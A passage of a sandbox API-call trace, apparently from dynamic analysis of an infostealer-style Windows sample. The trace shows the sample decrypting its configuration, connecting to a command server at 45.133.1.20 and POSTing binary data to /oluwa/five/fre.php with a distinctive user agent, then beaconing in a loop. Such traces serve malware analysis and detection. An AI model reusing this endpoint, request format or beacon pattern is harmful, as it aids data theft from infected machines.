pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0268.467] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.467] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0268.468] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.468] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0268.468] GetProcessHeap () returned 0x6a0000 [0268.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0268.469] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.469] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0268.470] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.470] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0268.470] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.471] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0268.485] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.486] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0268.486] GetProcessHeap () returned 0x6a0000 [0268.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0268.486] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0268.486] GetProcessHeap () returned 0x6a0000 [0268.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa60 [0268.486] socket (af=2, type=1, protocol=6) returned 0x960 [0268.486] connect (s=0x960, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0268.511] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0268.511] GetProcessHeap () returned 0x6a0000 [0268.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0268.511] GetProcessHeap () returned 0x6a0000 [0268.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0268.511] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0268.512] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0268.513] GetProcessHeap () returned 0x6a0000 [0268.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9f30 [0268.513] GetProcessHeap () returned 0x6a0000 [0268.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0268.513] GetProcessHeap () returned 0x6a0000 [0268.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0268.514] GetProcessHeap () returned 0x6a0000 [0268.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0268.515] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0268.516] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0268.516] GetProcessHeap () returned 0x6a0000 [0268.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0268.516] GetProcessHeap () returned 0x6a0000 [0268.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0268.516] send (s=0x960, buf=0x6bd460*, len=242, flags=0) returned 242 [0268.517] send (s=0x960, buf=0x6bb998*, len=159, flags=0) returned 159 [0268.517] GetProcessHeap () returned 0x6a0000 [0268.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0268.517] recv (in: s=0x960, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0268.593] GetProcessHeap () returned 0x6a0000 [0268.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0268.594] GetProcessHeap () returned 0x6a0000 [0268.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0268.595] GetProcessHeap () returned 0x6a0000 [0268.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9f30 | out: hHeap=0x6a0000) returned 1 [0268.595] GetProcessHeap () returned 0x6a0000 [0268.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0268.596] closesocket (s=0x960) returned 0 [0268.596] GetProcessHeap () returned 0x6a0000 [0268.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa60 | out: hHeap=0x6a0000) returned 1 [0268.596] GetProcessHeap () returned 0x6a0000 [0268.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0268.597] GetProcessHeap () returned 0x6a0000 [0268.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0268.597] GetProcessHeap () returned 0x6a0000 [0268.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0268.598] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x16e0) returned 0x960 [0268.599] Sleep (dwMilliseconds=0xea60) [0268.601] GetProcessHeap () returned 0x6a0000 [0268.601] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0268.602] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.602] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0268.610] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.610] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0268.620] GetProcessHeap () returned 0x6a0000 [0268.620] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0268.621] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.621] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0268.622] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.622] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0268.623] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.623] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0268.623] GetProcessHeap () returned 0x6a0000 [0268.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0268.624] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.624] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0268.625] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.626] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0268.626] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.626] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0268.627] GetProcessHeap () returned 0x6a0000 [0268.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0268.627] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.628] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0268.629] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.629] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0268.630] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.630] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0268.631] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.631] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0268.631] GetProcessHeap () returned 0x6a0000 [0268.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0268.632] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0268.640] GetProcessHeap () returned 0x6a0000 [0268.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0268.640] GetProcessHeap () returned 0x6a0000 [0268.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0268.641] GetProcessHeap () returned 0x6a0000 [0268.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0268.641] GetProcessHeap () returned 0x6a0000 [0268.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0268.642] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.642] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0268.655] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.656] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0268.667] GetProcessHeap () returned 0x6a0000 [0268.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0268.668] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.669] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0268.670] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.670] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0268.671] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.671] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0268.671] GetProcessHeap () returned 0x6a0000 [0268.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0268.673] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.674] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0268.674] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.675] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0268.677] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.677] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0268.678] GetProcessHeap () returned 0x6a0000 [0268.678] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0268.684] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.685] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0268.686] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.686] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0268.687] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.687] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0268.688] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.689] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0268.689] GetProcessHeap () returned 0x6a0000 [0268.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0268.689] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0268.689] GetProcessHeap () returned 0x6a0000 [0268.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaf0 [0268.689] socket (af=2, type=1, protocol=6) returned 0x964 [0268.690] connect (s=0x964, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0268.712] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0268.713] GetProcessHeap () returned 0x6a0000 [0268.713] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0268.713] GetProcessHeap () returned 0x6a0000 [0268.713] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0268.714] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0268.715] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0268.715] GetProcessHeap () returned 0x6a0000 [0268.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba0b0 [0268.715] GetProcessHeap () returned 0x6a0000 [0268.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0268.716] GetProcessHeap () returned 0x6a0000 [0268.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0268.716] GetProcessHeap () returned 0x6a0000 [0268.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0268.716] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0268.719] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0268.719] GetProcessHeap () returned 0x6a0000 [0268.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0268.719] GetProcessHeap () returned 0x6a0000 [0268.720] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0268.720] send (s=0x964, buf=0x6bd460*, len=242, flags=0) returned 242 [0268.721] send (s=0x964, buf=0x6bb998*, len=159, flags=0) returned 159 [0268.721] GetProcessHeap () returned 0x6a0000 [0268.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0268.721] recv (in: s=0x964, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0268.817] GetProcessHeap () returned 0x6a0000 [0268.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0268.817] GetProcessHeap () returned 0x6a0000 [0268.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0268.817] GetProcessHeap () returned 0x6a0000 [0268.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba0b0 | out: hHeap=0x6a0000) returned 1 [0268.818] GetProcessHeap () returned 0x6a0000 [0268.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0268.818] closesocket (s=0x964) returned 0 [0268.819] GetProcessHeap () returned 0x6a0000 [0268.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaf0 | out: hHeap=0x6a0000) returned 1 [0268.819] GetProcessHeap () returned 0x6a0000 [0268.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0268.819] GetProcessHeap () returned 0x6a0000 [0268.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0268.820] GetProcessHeap () returned 0x6a0000 [0268.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0268.839] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x16e4) returned 0x964 [0268.842] Sleep (dwMilliseconds=0xea60) [0268.843] GetProcessHeap () returned 0x6a0000 [0268.843] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0268.844] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.845] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0268.856] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.865] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0268.877] GetProcessHeap () returned 0x6a0000 [0268.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0268.878] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.878] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0268.880] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.881] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0268.882] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.882] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0268.882] GetProcessHeap () returned 0x6a0000 [0268.883] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0268.884] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.884] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0268.895] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.895] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0268.896] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.896] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0268.896] GetProcessHeap () returned 0x6a0000 [0268.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0268.897] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.898] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0268.899] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.899] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0268.900] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.904] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0268.905] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.905] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0268.905] GetProcessHeap () returned 0x6a0000 [0268.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0268.905] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0268.906] GetProcessHeap () returned 0x6a0000 [0268.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0268.906] GetProcessHeap () returned 0x6a0000 [0268.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0268.906] GetProcessHeap () returned 0x6a0000 [0268.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0268.907] GetProcessHeap () returned 0x6a0000 [0268.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0268.908] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.908] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0268.918] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.918] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0268.927] GetProcessHeap () returned 0x6a0000 [0268.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0268.928] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.928] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0268.929] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.930] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0268.931] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.931] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0268.931] GetProcessHeap () returned 0x6a0000 [0268.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0268.933] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.933] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0268.934] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.934] CryptDestroyKey (hKey=0x6ad560) returned 1 [0268.940] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.940] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0268.940] GetProcessHeap () returned 0x6a0000 [0268.940] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0268.941] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.941] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0268.942] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.942] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0268.943] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.944] StrStrA 